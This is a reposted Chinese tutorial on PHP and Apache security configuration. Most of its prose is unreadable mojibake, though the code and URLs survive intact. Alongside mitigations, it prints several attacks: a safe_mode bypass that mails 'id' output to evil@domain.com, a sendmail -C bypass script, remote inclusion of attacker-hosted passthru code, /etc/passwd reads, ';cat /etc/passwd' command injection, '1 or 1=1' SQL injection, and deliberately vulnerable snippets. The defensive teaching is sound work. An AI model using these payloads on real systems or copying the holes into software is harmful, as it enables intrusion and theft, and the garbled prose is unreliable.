哈喽比特
注册  |  登录

PHP°²È«ÅäÖÃ

5年以前  |  阅读数:268 次  |  编程语言:PHP 

PHP°²È«ÅaÖÃ

*Ò»¡¢WebþÎñÆ÷°²È«
*
PHPÆaʵ²»¹ýÊÇWebþÎñÆ÷µÄÒ»¸oÄ£¿e¹¦ÄÜ£¬ËuÒÔÊ×ÏÈÒª±£Ö¤WebþÎñÆ÷µÄ°²È«¡£µ±È»WebþÎñÆ÷Òª°²È«ÓÖ±ØÐeÊÇÏȱ£Ö¤ÏµÍ³°²È«£¬ÕaÑu¾Í³¶Ô¶ÁË£¬ÎÞÇiÎÞ¾¡¡£PHP¿ÉÒԺ͸÷ÖÖWebþÎñÆ÷½aºÏ£¬ÕaÀiÒ²Ö»ÌÖÂÛApache¡£Ç³£½¨ÒeÒÔchroot½Ê½°²×°Æo¶¯Apache£¬ÕaÑu¼´Ê¹ApacheºÍPHP¼°Æa½Å±¾³oÏÖÂ(C)¶´£¬ÊÜÓ°ÏiµÄÒ²Ö»ÓÐÕa¸o½uiÀµÄϵͳ£¬²»»aΣº¦Êµ¼Êϵͳ¡£µ«ÊÇʹÓÃchrootµÄApacheºo£¬¸øÓ¦ÓÃÒ²»a´øÀ´Ò»¶¨µÄÂe³£¬±ÈÈçÁ¬½Ómysqlʱ±ØÐeÓÃ127.0.0.1µØÖʹÓÃtcpÁ¬½Ó¶ø²»ÄÜÓÃlocalhostʵÏÖsocketÁ¬½Ó£¬ÕaÔÚЧÂÊÉÏ»aÉÔ΢²iÒ»µa¡£»¹ÓÐmailº¯Êý¢ËÍÓʼþÒ²ÊǸoÎÊÌa£¬ÒoΪphp.iniÀiµÄ£º

[mail function]
; For Win32 only.
SMTP = localhost

; For Win32 only.
sendmail_from = me@localhost.com

¶¼ÊÇÕe¶ÔWin32ƽ̨£¬ËuÒÔÐeÒªÔÚchroot»*¾³Ïµ÷ÕuºÃsendmail¡£

¶þ¡¢PHP±¾ÉiÎÊÌa

1¡¢Ô¶³ÌÒç³o

PHP-4.1.2ÒÔϵÄËuÓаae±¾¶¼´aeÔÚÎļþÉÏ´«Ô¶³Ì»º³aÇøÒç³oÂ(C)¶´£¬¶øÇÒ¹¥»÷³ÌÐoÒѾ­¹aºÁ÷´«£¬³É¹¦ÂÊdz£¸ß£º

http://packetstormsecurity.org/0204-exploits/7350fun
http://hsj.shadowpenguin.org/misc/php3018_exp.txt

2¡¢Ô¶³Ì¾Ü¾ø*þÎñ

PHP-4.2.0ºÍPHP-4.2.1´aeÔÚPHP multipart/form-data POSTÇeÇo´¦ÀiÔ¶³ÌÂ(C)¶´£¬ËaÈ»²»ÄÜ»ñµÃ±¾µØÓû§È¨ÏÞ£¬µ«ÊÇÒ²ÄÜÔi³É¾Ü¾ø*þÎñ¡£

3¡¢safe_modeÈƹýÂ(C)¶´

»¹ÓÐPHP-4.2.2ÒÔϵ½PHP-4.0.5°ae±¾¶¼´aeÔÚPHP mailº¯ÊýÈƹýsafe_modeÏÞÖÆÖ´ÐÐÃuÁiÂ(C)¶´£¬4.0.5°ae±¾¿ªÊ¼mailº¯ÊýÔo¼ÓÁ˵ÚÎa¸o²ÎÊý£¬ÓÉÓÚÉe¼ÆÕß¿¼ÂDz»ÖÜ¿ÉÒÔÍ»ÆÆsafe_modeµÄÏÞÖÆÖ´ÐÐÃuÁi¡£ÆaÖÐ4.0.5°ae±¾Í»ÆÆdz£¼oµ¥£¬Ö»ÐeÓÃֺŸo¿ªºoÃae¼ÓshellÃuÁi¾Í¿ÉÒÔÁË£¬±ÈÈç´aeÔÚPHP½Å±¾evil.php£º

<? mail("foo@bar,"foo","bar","",$bar); ?>

Ö´ÐÐÈçϵÄURL£º

http://foo.com/evil.php?bar=;/usr/bin/id|mail evil@domain.com

Õa½«idÖ´ÐеĽa¹u*¢Ë͸øevil@domain.com¡£

¶ÔÓÚ4.0.6ÖÁ4.2.2µÄPHPÍ»ÆÆsafe_modeÏÞÖÆÆaʵÊÇÀuÓÃÁËsendmailµÄ-C²ÎÊý£¬ËuÒÔϵͳ±ØÐeÊÇʹÓÃsendmail¡£ÈçϵĴuÂeÄܹ»Í»ÆÆsafe_modeÏÞÖÆÖ´ÐÐÃuÁi£º

<?

×¢Òa£¬ÏÂÃaeÕaÁ½¸o±ØÐeÊDz»´aeÔڵģ¬»oÕßËuÃǵÄÊoÖ÷ºÍ±¾½Å±¾µÄÊoÖ÷ÊÇÒ»Ñu

$script="/tmp/script123";
$cf="/tmp/cf123";

$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);

$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);

mail("nobody", "", "", "", "-C$cf");
?>

»¹ÊÇʹÓÃÒÔÉÏÓÐÎÊÌa°ae±¾PHPµÄÓû§Ò»¶¨Òª¼°Ê±Éý¼¶µ½×iаae±¾£¬ÕaÑu²ÅÄÜÏu³ý»u±¾µÄ°²È«ÎÊÌa¡£

Èý¡¢PHP±¾ÉiµÄ°²È«ÅaÖÃ

PHPµÄÅaÖÃ*dz£Áe»i£¬¿ÉÒÔͨ¹ýphp.ini, httpd.conf, .htaccessÎļþ£¨¸ÃĿ¼±ØÐeÉeÖÃÁËAllowOverride All»oOptions£(C)½øÐÐÉeÖ㬻¹¿ÉÒÔÔڽű¾³ÌÐoÀiʹÓÃini_set()¼°ÆaËuµÄÌض¨µÄº¯Êý½øÐÐÉeÖá£Í¨¹ýphpinfo()ºÍget_cfg_var()º¯Êý¿ÉÒԵõ½ÅaÖÃÑ¡ÏiµÄ¸÷¸oÖµ¡£

Èç¹uÅaÖÃÑ¡ÏiÊÇΨһPHP_INI_SYSTEMÊoÐԵģ¬±ØÐeͨ¹ýphp.iniºÍhttpd.confÀ´Ð޸ģ¬ËuÃÇÐ޸ĵÄÊÇPHPµÄMasterÖµ£¬µ«ÐÞ¸ÄÖ®ºo±ØÐeÖØÆoapache²ÅÄÜÉuЧ¡£ÆaÖÐphp.iniÉeÖõÄÑ¡ÏiÊǶÔWeb*þÎñÆ÷ËuÓнű¾ÉuЧ£¬httpd.confÀiÉeÖõÄÑ¡ÏiÊǶԸö¨ÒaµÄĿ¼ÏÂËuÓнű¾ÉuЧ¡£

Èç¹u»¹ÓÐÆaËuµÄPHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALLÊoÐÔµÄÑ¡Ïi¾Í¿ÉÒÔʹÓÃ.htaccessÎļþÉeÖã¬Ò²¿ÉÒÔͨ¹ýÔڽű¾³ÌÐo×ÔÉiÓÃini_set()º¯ÊýÉe¶¨£¬ËuÃÇÐ޸ĵÄÊÇLocalÖµ£¬¸ÄÁËÒÔºoÂiÉÏÉuЧ¡£µ«ÊÇ.htaccessÖ»¶Ôµ±Ç°Ä¿Â¼µÄ½Å±¾³ÌÐoÉuЧ£¬ini_set()º¯ÊýÖ»¶Ô¸Ã½Å±¾³ÌÐoÉeÖÃini_set()º¯ÊýÒÔºoµÄ´uÂeÉuЧ¡£¸÷¸o°ae±¾µÄÑ¡ÏiÊoÐÔ¿ÉÄܲ»¾¡Ïaͬ£¬¿ÉÒÔÓÃÈçÏÂÃuÁi²eÕÒµ±Ç°Ô´´uÂeµÄmain.cÎļþµÃµ½ËuÓеÄÑ¡Ïi£¬ÒÔ¼°ËuµÄÊoÐÔ£º

grep PHPINI /PHP_SRC/main/main.c

ÔÚÌÖÂÛPHP°²È«ÅaÖÃ֮ǰ£¬Ó¦¸ÃºÃºÃÁ˽aPHPµÄsafe_modeģʽ¡£

1¡¢safe_mode

safe_modeÊÇΨһPHP_INI_SYSTEMÊoÐÔ£¬±ØÐeͨ¹ýphp.ini»ohttpd.confÀ´ÉeÖá£ÒªÆoÓÃsafe_mode£¬Ö»ÐeÐÞ¸Äphp.ini£º

safe_mode = On

»oÕßÐÞ¸Ähttpd.conf£¬¶¨ÒaĿ¼£º

<Directory /var/www>
Options FollowSymLinks
php_admin_value safe_mode 1

ÖØÆoapacheºosafe_mode¾ÍÉuЧÁË¡£Æo¶¯safe_mode£¬»a¶ÔÐi¶aPHPº¯Êý½øÐÐÏÞÖÆ£¬ÌرðÊǺÍϵͳÏa¹ØµÄÎļþ´o¿ª¡¢ÃuÁiÖ´ÐеȺ¯Êý¡£
ËuÓвÙ×÷ÎļþµÄº¯Êý½«Ö»ÄܲÙ×÷Óe½Å±¾UIDÏaͬµÄÎļþ£¬±ÈÈçtest.php½Å±¾µÄÄÚÈÝΪ£º

<?include("index.html")?>

¼¸¸oÎļþµÄÊoÐÔÈçÏ£º

ls -la

total 13
drwxr-xr-x 2 root root 104 Jul 20 01:25 .
drwxr-xr-x 16 root root 384 Jul 18 12:02 ..
-rw-r--r-- 1 root root 4110 Oct 26 2002 index.html
-rw-r--r-- 1 www-data www-data 41 Jul 19 19:14 test.php

ÔÚa¯ÀÀÆ÷ÇeÇotest.php»aÌaʾÈçϵĴiÎoÐÅÏ¢£º

Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1

Èç¹u±»²Ù×÷ÎļþËuÔÚĿ¼µÄUIDºÍ½Å±¾UIDÒ»Ö£¬ÄÇô¸ÃÎļþµÄUID¼´Ê¹ºÍ½Å±¾²»Í¬Ò²¿ÉÒÔÃÎʵģ¬²»ÖªÕaÊÇñÊÇPHPµÄÒ»¸oÂ(C)¶´»¹ÊÇÁiÓÐÒþÇe¡£ËuÒÔphp½Å±¾ÊoÖ÷Õa¸oÓû§×iºÃ¾ÍÖ»×÷Õa¸oÓÃ;£¬¾ø¶Ô½uֹʹÓÃroot×oΪphp½Å±¾µÄÊoÖ÷£¬ÕaÑu¾Í´i²»µ½safe_modeµÄЧ¹uÁË¡£

Èç¹uÏe½«Æa*Å¿iµ½GID±È½Ï£¬Ôo´o¿ª safe_mode_gid¿ÉÒÔ¿¼ÂÇÖ»±È½ÏÎļþµÄGID£¬¿ÉÒÔÉeÖÃÈçÏÂÑ¡Ïi£º

safe_mode_gid = On

ÉeÖÃÁËsafe_modeÒÔºo£¬ËuÓÐÃuÁiÖ´Ðеĺ¯Êý½«±»ÏÞÖÆÖ»ÄÜÖ´ÐÐphp.iniÀisafe_mode_exec_dirÖ¸¶¨Ä¿Â¼ÀiµÄ³ÌÐo£¬¶øÇÒshell_exec¡¢ls -lÕaÖÖÖ´ÐÐÃuÁiµÄ½Ê½»a±»½uÖ¹¡£Èç¹uÈʵÐeÒªµ÷ÓÃÆaËu³ÌÐo£¬¿ÉÒÔÔÚphp.ini×oÈçÏÂÉeÖãº

safe_mode_exec_dir = /usr/local/php/exec

È»ºo¿½±´³ÌÐoµ½¸ÃĿ¼£¬ÄÇôphp½Å±¾¾Í¿ÉÒÔÓÃsystemµÈº¯ÊýÀ´Ö´ÐиóÌÐo¡£¶øÇÒ¸ÃĿ¼ÀiµÄshell½Å±¾»¹ÊÇ¿ÉÒÔµ÷ÓÃÆaËuĿ¼ÀiµÄϵͳÃuÁi¡£

safe_mode_include_dir string
µ±´Ó´ËĿ¼¼°Æa×ÓĿ¼£¨Ä¿Â¼±ØÐeÔÚ include_path ÖлoÕßÓÃÍeÕuÂ*¾¶À´°uº¬£(C)°uº¬ÎļþʱԽ¹ý UID/GID ¼i²e¡£

´Ó PHP 4.2.0 ¿ªÊ¼£¬±¾Ö¸Ái¿ÉÒÔ½ÓÊÜºÍ include_path Ö¸ÁiÀaËƵÄç¸ñÓÃֺŸo¿ªµÄÂ*¾¶£¬¶ø²»Ö»ÊÇÒ»¸oĿ¼¡£

Ö¸¶¨µÄÏÞÖÆʵ¼ÊÉÏÊÇÒ»¸oǰ׺£¬¶øÇÒ»¸oĿ¼Ãu¡£ÕaÒ²¾ÍÊÇ˵¡°safe_mode_include_dir = /dir/incl¡±½«ÔÊÐiÃÎÊ¡°/dir/include¡±ºÍ¡°/dir/incls¡±£¬Èç¹uËuÃÇ´aeÔÚ¡£Èç¹uÄuÏ£Íu½«*ÃÎÊ¿ØÖÆÔÚÒ»¸oÖ¸¶¨µÄĿ¼£¬ÄÇôÇeÔÚ½aβ¼ÓÉÏÒ»¸oбÏߣ¬ÀýÈ磺¡°safe_mode_include_dir = /dir/incl/¡±¡£

safe_mode_allowed_envvars string
ÉeÖÃijÐ(C)»¾³±aÁKÉÄÜÊÇDZÔڵݲȫȱ¿Ú¡£±¾Ö¸Ái°uº¬ÓÐÒ»¸o¶ººÅÖ¸oµÄǰ׺Áбi¡£ÔÚ°²È«Ä£Ê½Ï£¬Óû§Ö»ÄܸıaÄÇÐ(C)Ãu×Ö¾ßÓÐÔÚÕaÀiÌa¹(C)µÄǰ׺µÄ»*¾³±aÁ¿¡£Ä¬ÈÏÇe¿oÏ£¬Óû§Ö»ÄÜÉeÖÃÒ?PHP ¿ªÍµÄ»¾³±aÁ¿£¨ÀýÈç PHP_FOO = BAR£(C)¡£

×¢: Èç¹u±¾Ö¸ÁiΪ¿Õ£¬PHP ½«Ê¹Óû§¿ÉÒÔÐÞ¸ÄÈκλ*¾³±aÁ¿£¡

safe_mode_protected_env_vars string
±¾Ö¸Ái°uº¬ÓÐÒ»¸o¶ººÅÖ¸oµÄ»¾³±aÁ¿µÄÁбi£¬×iÖÕÓû§²»ÄÜÓà putenv() À´¸Ä±aÕaÐ(C)»*¾³±aÁ¿¡£ÉoÖÁÔÚ safe_mode_allowed_env_vars ÖÐÉeÖÃÁËÔÊÐiÐÞ¸ÄʱҲ²»ÄܸıaÕaÐ(C)±aÁ¿¡£

ËaÈ»safe_mode²»ÊÇÍoÄܵģ¨µÍ°ae±¾µÄPHP¿ÉÒÔÈƹý£(C)£¬µ«»¹ÊÇÇ¿ÁÒ½¨Òe´o¿ª°²È«Ä£Ê½£¬ÔÚÒ»¶¨³Ì¶ÈÉÏÄܹ»±ÜÃaÒ»Ð(C)δ֪µÄ¹¥»÷¡£²»¹ýÆoÓÃsafe_mode»aÓкܶaÏÞÖÆ£¬¿ÉÄܶÔÓ¦ÓôøÀ´Ó°Ïi£¬ËuÒÔ»¹ÐeÒªµ÷Õu´uÂeºÍÅaÖòÅÄܺÍг¡£±»°²È«Ä£Ê½ÏÞÖÆ»oÆÁ±ÎµÄº¯Êý¿ÉÒԲο¼PHPÊÖ²a¡£

ÌÖÂÛÍesafe_modeºo£¬ÏÂÃae½aºÏ³ÌÐo´uÂeʵ¼Ê¿ÉÄܳoÏÖµÄÎÊÌaÌÖÂÛÈçºÎͨ¹ý¶ÔPHP*þÎñÆ÷¶ËµÄÅaÖÃÀ´±ÜÃa³oÏÖµÄÂ(C)¶´¡£

2¡¢±aÁ¿ÀÄÓÃ

PHPĬÈÏregister_globals = On£¬¶ÔÓÚGET, POST, Cookie, Environment, SessionµÄ±aÁKÉÒÔÖ±½Ó×¢²a³ÉÈ«¾Ö±aÁ¿¡£ËuÃǵÄ×¢²a˳ÐoÊÇvariables_order = "EGPCS"£¨¿ÉÒÔͨ¹ýphp.iniÐ޸ģ(C)£¬Í¬Ãu±aÁ¿variables_orderÓұߵĸ²¸Ç×o±ß£¬ËuÒÔ±aÁ¿µÄÀÄÓü«Ò×Ôi³É³ÌÐoµÄ»iÂÒ¡£¶øÇҽű¾³ÌÐoÔ±ÍuÍuûÓжԱaÁ¿³oʼ»¯µÄÏ°¹ß£¬ÏñÈçϵijÌÐoƬ¶Ï¾Í¼«Ò×Êܵ½¹¥»÷£º

<?
//test_1.php

if ($pass == "hello")
$auth = 1;

if ($auth == 1)
echo "some important information";
else
echo "nothing";
?>

¹¥»÷ÕßÖ»ÐeÓÃÈçϵÄÇeÇo¾ÍÄÜÈƹý¼i²e£º
http://victim/test_1.php?auth=1

ÕaËaÈ»ÊÇÒ»¸oºÜÈoÖǵĴiÎo£¬µ«Ò»Ð(C)ÖøÃuµÄ³ÌÐoÒ²ÓÐ*¸¹ýÕaÖÖ´iÎo£¬±ÈÈçphpnukeµÄÔ¶³ÌÎļþ¿½±´Â(C)¶´http://www.securityfocus.com/bid/3361

PHP-4.1.0¢²¼µÄʱºo½¨Òe¹Ø±Õregister_globals£¬²¢Ìa¹(C)ÁË7¸oÌØÊaµÄÊý×e±aÁ¿À´Ê¹Óø÷ÖÖ±aÁ¿¡£¶ÔÓÚ´ÓGET¡¢POST¡¢COOKIEµÈÀ´µÄ±aÁ¿²¢²»»aÖ±½Ó×¢²a³É±aÁ¿£¬±ØÐeͨ¹ýÊý×e±aÁ¿À´´aeÈ¡¡£PHP-4.2.0¢²¼µÄʱºo£¬php.iniĬÈÏÅaÖþÍÊÇregister_globals = Off¡£ÕaʹµÃ³ÌÐoʹÓÃPHP×ÔÉi³oʼ»¯µÄĬÈÏÖµ£¬Ò»°aΪ0£¬±ÜÃaÁ˹¥»÷Õß¿ØÖÆÅжϱaÁ¿¡£

½a¾o½¨£º

ÅaÖÃÎļþphp.iniÉeÖÃregister_globals = Off¡£

ÒªÇo³ÌÐoÔ±¶Ô×÷ΪÅжϵıaÁ¿ÔÚ³ÌÐo×i¿ªÊ¼³oʼ»¯Ò»¸oÖµ¡£

3¡¢Îļþ´o¿ª

¼«Ò×Êܹ¥»÷µÄ´uÂeƬ¶Ï£º

<?
//test_2.php

if (!($str = readfile("$filename"))) {
echo("Could not open file: $filename
\n");
exit;
}
else {
echo $str;
}
?>

ÓÉÓÚ¹¥»÷Õß¿ÉÒÔÖ¸¶¨ÈÎÒaµÄ$filename£¬¹¥»÷ÕßÓÃÈçϵÄÇeÇo¾Í¿ÉÒÔ¿´µ½/etc/passwd£º

http://victim/test_2.php?filename=/etc/passwd

ÈçÏÂÇeÇo¿ÉÒÔ¶ÁphpÎļþ±¾Éi£º

http://victim/test_2.php?filename=test_2.php

PHPÖÐÎļþ´o¿ªº¯Êý»¹ÓÐfopen(), file()µÈ£¬Èç¹u¶ÔÎļþÃu±aÁ¿¼i²e²»ÑϾͻaÔi³ÉþÎñÆ÷ÖØÒªÎļþ±»ÃÎʶÁÈ¡¡£

½a¾o½¨£º

Èç*ÇÌØÊaÐeÒª£¬°ÑphpµÄÎļþ²Ù×÷ÏÞÖÆÔÚwebĿ¼ÀiÃae¡£ÒÔÏÂÊÇÐÞ¸ÄapacheÅaÖÃÎļþhttpd.confµÄÒ»¸oÀý×Ó£º

<Directory /usr/local/apache/htdocs>
php_admin_value open_basedir /usr/local/apache/htdocs

ÖØÆoapacheºo£¬/usr/local/apache/htdocsĿ¼ÏµÄPHP½Å±¾¾ÍÖ»ÄܲÙ×÷Ëu×Ô¼ºÄ¿Â¼ÏµÄÎļþÁË£¬*ñÔoPHP¾Í»a±¨´i£º

Warning: open_basedir restriction in effect. File is in wrong directory in xxx on line xx.

ʹÓÃsafe_modeģʽҲÄܱÜÃaÕaÖÖÎÊÌa£¬Ç°ÃaeÒѾ­ÌÖÂÛ¹ýÁË¡£

4¡¢°uº¬Îļþ

¼«Ò×Êܹ¥»÷µÄ´uÂeƬ¶Ï£º

<?
//test_3.php

if(file_exists($filename))
include("$filename");
?>

ÕaÖÖ²»¸ºÔðÈεĴuÂe»aÔi³ÉÏaµ±´oµÄΣº¦£¬¹¥»÷ÕßÓÃÈçÏÂÇeÇo¿ÉÒԵõ½/etc/passwdÎļþ£º

http://victim/test_3.php?filename=/etc/passwd

Èç¹u¶ÔÓÚUnix°aeµÄPHP£¨Win°aeµÄPHP²»Ö§³ÖÔ¶³Ì´o¿ªÎļþ£(C)¹¥»÷Õß¿ÉÒÔÔÚ×Ô¼º¿ªÁËhttp»oftp*þÎñµÄ»uÆ÷ÉϽ¨Á¢Ò»¸o°uº¬shellÃuÁiµÄÎļþ£¬http://attack/attack.txtµÄÄÚÈÝÊÇ<?passthru("ls /etc")?>£¬ÄÇôÈçϵÄÇeÇo¾Í¿ÉÒÔÔÚÄ¿±eÖ÷»uÖ´ÐÐÃuÁils /etc£º

http://victim/test_3.php?filename=http://attack/attack.txt

¹¥»÷ÕßÉoÖÁ¿ÉÒÔͨ¹ý°uº¬apacheµÄÈÕÖ¾Îļþaccess.logºÍerror.logÀ´µÃµ½Ö´ÐÐÃuÁiµÄ´uÂe£¬²»¹ýÓÉÓÚ¸ÉÈÅÐÅϢ̫¶a£¬ÓÐʱ²»Ò׳ɹ¦¡£
¶ÔÓÚÁiÍaÒ»ÖÖÐÎʽ£¬ÈçÏ´uÂeƬ¶Ï£º

<?
//test_4.php

include("$lib/config.php");
?>

¹¥»÷Õß¿ÉÒÔÔÚ×Ô¼ºµÄÖ÷»u½¨Á¢Ò»¸o°uº¬Ö´ÐÐÃuÁi´uÂeµÄconfig.phpÎļþ£¬È»ºoÓÃÈçÏÂÇeÇoÒ²¿ÉÒÔÔÚÄ¿±eÖ÷»uÖ´ÐÐÃuÁi£º

http://victim/test_4.php?lib=http://attack

PHPµÄ°uº¬º¯ÊýÓÐinclude(), include_once(), require(), require_once¡£Èç¹u¶Ô°uº¬ÎļþÃu±aÁ¿¼i²e²»ÑϾͻa¶ÔϵͳÔi³ÉÑÏÖØΣÏÕ£¬¿ÉÒÔÔ¶³ÌÖ´ÐÐÃuÁi¡£

½a¾o½¨£º

ÒªÇo³ÌÐoÔ±°uº¬ÎļþÀiµÄ²ÎÊý¾¡Á¿²»ÒªÊ¹ÓñaÁ¿£¬Èç¹uʹÓñaÁ¿£¬¾ÍÒ»¶¨ÒªÑϸñ¼i²eÒª°uº¬µÄÎļþÃu£¬¾ø¶Ô²»ÄÜÓÉÓû§ÈÎÒaÖ¸¶¨¡£

ÈçÇ°ÃaeÎļþ´o¿ªÖÐÏÞÖÆPHP²Ù×÷¾¶ÊÇÒ»¸o±ØÒªµÄÑ¡Ïi¡£ÁiÍa£¬ÈçÇÌØÊaÐeÒª£¬Ò»¶¨Òª¹Ø±ÕPHPµÄÔ¶³ÌÎļþ´o¿ª¹¦ÄÜ¡£ÐÞ¸Äphp.iniÎļþ£º

allow_url_fopen = Off

ÖØÆoapache¡£

5¡¢ÎļþÉÏ´«

phpµÄÎļþÉÏ´«»uÖÆÊÇ°ÑÓû§ÉÏ´«µÄÎļþ±£´aeÔÚphp.iniµÄupload_tmp_dir¶¨ÒaµÄÁÙʱĿ¼£¨Ä¬ÈÏÊÇϵͳµÄÁÙʱĿ¼£¬È磺/tmp£(C)ÀiµÄÒ»¸oÀaËÆphpxXuoXGµÄËae»uÁÙʱÎļþ£¬³ÌÐoÖ´ÐнaÊø£¬¸ÃÁÙʱÎļþÒ²±»É¾³ý¡£PHP¸øÉÏ´«µÄÎļþ¶¨ÒaÁËËĸo±aÁ¿£º£¨Èçform±aÁ¿ÃuÊÇfile£¬¶øÇÒregister_globals´o¿ª£(C)

$file #¾ÍÊDZ£´aeµ½*þÎñÆ÷¶ËµÄÁÙʱÎļþ£¨Èç/tmp/phpxXuoXG £(C)
$file_size #ÉÏ´«ÎļþµÄ´oС
$file_name #ÉÏ´«ÎļþµÄԭʼÃu³Æ
$file_type #ÉÏ´«ÎļþµÄÀaÐÍ

ÍƼoʹÓãº

$HTTP_POST_FILES[file][tmp_name]
$HTTP_POST_FILES[file][size]
$HTTP_POST_FILES[file][name]
$HTTP_POST_FILES[file][type]

ÕaÊÇÒ»¸o×i¼oµ¥µÄÎļþÉÏ´«´uÂe£º

<?
//test_5.php

if(isset($upload) && $file != "none") {
copy($file, "/usr/local/apache/htdocs/upload/".$file_name);
echo "Îļþ".$file_name."ÉÏ´«³É¹¦£¡µa»÷<a href=\"$PHP_SELF\">¼ÌÐøÉÏ´«";
exit;
}
?>

ÎļþÉÏ´«
ÉÏ´«Îļþ:

ÕaÑuµÄÉÏ´«´uÂe´aeÔÚ¶ÁÈ¡ÈÎÒaÎļþºÍÖ´ÐÐÃuÁiµÄÖØ´oÎÊÌa¡£
ÏÂÃaeµÄÇeÇo¿ÉÒÔ°Ñ/etc/passwdÎĵµ¿½±´µ½webĿ¼/usr/local/apache/htdocs/test£¨×¢Òa£ºÕa¸oĿ¼±ØÐenobody¿Éд£(C)ϵÄattack.txtÎļþÀi£º

http://victim/test_5.php?upload= ... ile_name=attack.txt

È»ºo¿ÉÒÔÓÃÈçÏÂÇeÇo¶ÁÈ¡¿ÚÁiÎļþ£º

http://victim/test/attack.txt

¹¥»÷Õß¿ÉÒÔ°ÑphpÎļþ¿½±´³ÉÆaËuÀ(C)Õ¹Ãu£¬Ð¹Â(C)½Å±¾Ô´´uÂe¡£
¹¥»÷Õß¿ÉÒÔ×Ô¶¨ÒaformÀifile_name±aÁ¿µÄÖµ£¬ÉÏ´«¸²¸ÇÈÎÒaÓÐдȨÏÞµÄÎļþ¡£
¹¥»÷Õß»¹¿ÉÒÔÉÏ´«PHP½Å±¾Ö´ÐÐÖ÷»uµÄÃuÁi¡£

½a¾o½¨£º

PHP-4.0.3ÒÔºoÌa¹(C)ÁËis_uploaded_fileºÍmove_uploaded_fileº¯Êý£¬¿ÉÒÔ¼i²e²Ù×÷µÄÎļþÊÇ*ñÊÇÓû§ÉÏ´«µÄÎļþ£¬´Ó¶ø±ÜÃa°ÑϵͳÎļþ¿½±´µ½webĿ¼¡£
ʹÓÃ$HTTP_POST_FILESÊý×eÀ´¶ÁÈ¡Óû§ÉÏ´«µÄÎļþ±aÁ¿¡£
Ñϸñ¼i²eÉÏ´«±aÁ¿¡£±ÈÈç²»ÔÊÐiÊÇphp½Å±¾Îļþ¡£

°ÑPHP½Å±¾²Ù×÷ÏÞÖÆÔÚwebĿ¼¿ÉÒÔ±ÜÃa³ÌÐoԱʹÓÃcopyº¯Êý°ÑϵͳÎļþ¿½±´µ½webĿ¼¡£move_uploaded_file²»ÊÜopen_basedirµÄÏÞÖÆ£¬ËuÒÔ²»±ØÐÞ¸Äphp.iniÀiupload_tmp_dirµÄÖµ¡£
°ÑPHP½Å±¾ÓÃphpencode½øÐмÓÃÜ£¬±ÜÃaÓÉÓÚcopy²Ù×÷йÂ(C)Ô´Âe¡£
ÑϸñÅaÖÃÎļþºÍĿ¼µÄȨÏÞ£¬Ö»ÔÊÐiÉÏ´«µÄĿ¼Äܹ»ÈÃnobodyÓû§¿Éд¡£
¶ÔÓÚÉÏ´«Ä¿Â¼È¥µoPHP½aÊ͹¦ÄÜ£¬¿ÉÒÔͨ¹ýÐÞ¸Ähttpd.confʵÏÖ£º

<Directory /usr/local/apache/htdocs/upload>
php_flag engine off

Èç¹uÊÇphp3»»³Éphp3_engine off

ÖØÆoapache£¬uploadĿ¼µÄphpÎļþ¾Í²»Äܱ»apache½aÊÍÁË£¬¼´Ê¹ÉÏ´«ÁËphpÎļþҲûÓÐÎÊÌa£¬Ö»ÄÜÖ±½ÓÏÔʾԴÂe¡£

6¡¢ÃuÁiÖ´ÐÐ

ÏÂÃaeµÄ´uÂeƬ¶ÏÊÇ´ÓPHPNetToolpackÕª³o£¬ÏeϸµÄÃeÊo¼u£º

http://www.securityfocus.com/bid/4303

<?
//test_6.php

system("traceroute $a_query",$ret_strs);
?>

ÓÉÓÚ³ÌÐoûÓйýÂË$a_query±aÁ¿£¬ËuÒÔ¹¥»÷Õß¿ÉÒÔÓÃÖºÅÀ´×¼ÓÖ´ÐÐÃuÁi¡£

¹¥»÷ÕßÊaÈeÈçÏÂÇeÇo¿ÉÒÔÖ´ÐÐcat /etc/passwdÃuÁi£º

http://victim/test_6.php?a_query=www.example.com;cat /etc/passwd

PHPµÄÃuÁiÖ´Ðк¯Êý»¹ÓÐsystem(), passthru(), popen()ºÍ``µÈ¡£ÃuÁiÖ´Ðк¯Êý*dz£Î£ÏÕ£¬É÷Óá£Èç¹uҪʹÓÃÒ»¶¨ÒªÑϸñ¼i²eÓû§ÊaÈe¡£

½a¾o½¨£º

ÒªÇo³ÌÐoԱʹÓÃescapeshellcmd()º¯Êý¹ýÂËÓû§ÊaÈeµÄshellÃuÁi¡£

ÆoÓÃsafe_mode¿ÉÒԶžøºÜ¶aÖ´ÐÐÃuÁiµÄÎÊÌa£¬²»¹ýҪעÒaPHPµÄ°ae±¾Ò»¶¨ÒªÊÇ×iеģ¬Ð¡ÓÚPHP-4.2.2µÄ¶¼¿ÉÄÜÈƹýsafe_modeµÄÏÞÖÆÈ¥Ö´ÐÐÃuÁi¡£

7¡¢sql_inject

ÈçϵÄSQLÓi¾aÈç¹uδ¶Ô±aÁ¿½øÐд¦Ài¾Í»a´aeÔÚÎÊÌa£º

select * from login where user=$user and pass=$pass

¹¥»÷Õß¿ÉÒÔÓû§ÃuºÍ¿ÚÁi¶¼ÊaÈe1 or 1=1ÈƹýÑeÖ¤¡£

²»¹ýÐÒ¿÷PHPÓÐÒ»¸oĬÈϵÄÑ¡Ïimagic_quotes_gpc = On£¬¸ÃÑ¡ÏiʹµÃ´ÓGET, POST, COOKIEÀ´µÄ±aÁ¿×Ô¶¯¼ÓÁËaddslashes()²Ù×÷¡£ÉÏÃaeSQLÓi¾a±a³ÉÁË£º

select * from login where user=1\ or 1=\1 and pass=1\ or 1=\1

´Ó¶ø±ÜÃaÁË´ËÀasql_inject¹¥»÷¡£

¶ÔÓÚÊý×ÖÀaÐ͵Ä×ֶΣ¬ºÜ¶a³ÌÐoÔ±»aÕaÑuд£º

select * from test where id=$id

